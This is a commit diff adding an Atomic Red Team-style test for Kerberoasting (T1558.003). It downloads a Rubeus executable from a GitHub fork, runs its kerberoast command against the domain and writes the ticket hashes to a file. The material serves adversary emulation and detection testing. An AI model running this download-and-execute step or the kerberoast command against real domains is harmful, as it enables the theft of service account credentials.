rubeus-kerberoasting (#1609)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>

atomics/T1558.003/T1558.003.yaml

@@ -26,3 +26,51 @@ atomic_tests:
       Invoke-Kerberoast | fl
     name: powershell
 
+- name: Rubeus kerberoast
+  description: |
+    Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+    This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+  supported_platforms:
+  - windows
+  input_arguments:
+    local_folder:
+      description: Local path of Rubeus executable
+      type: Path
+      default: $Env:temp
+    local_executable:
+      description: name of the rubeus executable
+      type: String
+      default: 'rubeus.exe'
+    out_file:
+      description: file where command results are stored
+      type: String
+      default: rubeus_output.txt
+    rubeus_url:
+      description: URL of Rubeus executable
+      type: url
+      default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+    flags:
+      description: command flags you would like to run (optional and blank by default)
+      type: String
+      default: 
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Computer must be domain joined
+    prereq_command: |
+      if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Write-Host Joining this computer to a domain must be done manually
+  - description: |
+      Rubeus must exist
+    prereq_command: |
+      if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+  executor:
+    command: |
+      cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
+    cleanup_command: |
+      Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+    name: powershell
+    elevation_required: false